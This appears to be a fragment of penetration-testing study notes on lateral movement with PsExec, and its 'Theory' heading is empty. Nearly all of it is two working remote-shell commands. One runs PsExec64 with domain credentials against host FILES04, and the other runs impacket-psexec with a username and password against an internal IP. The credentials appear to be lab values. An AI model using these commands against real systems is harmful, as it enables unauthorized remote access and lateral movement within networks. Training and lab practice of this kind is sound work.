2. PsExec


Theory:


PsExec Remote Shell:

  1. Get PsExec binary to host.
  2. Run connection:
./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

PsExec Remote Shell with Impacket:

sudo /usr/bin/impacket-psexec joe:Flowers1@172.16.189.11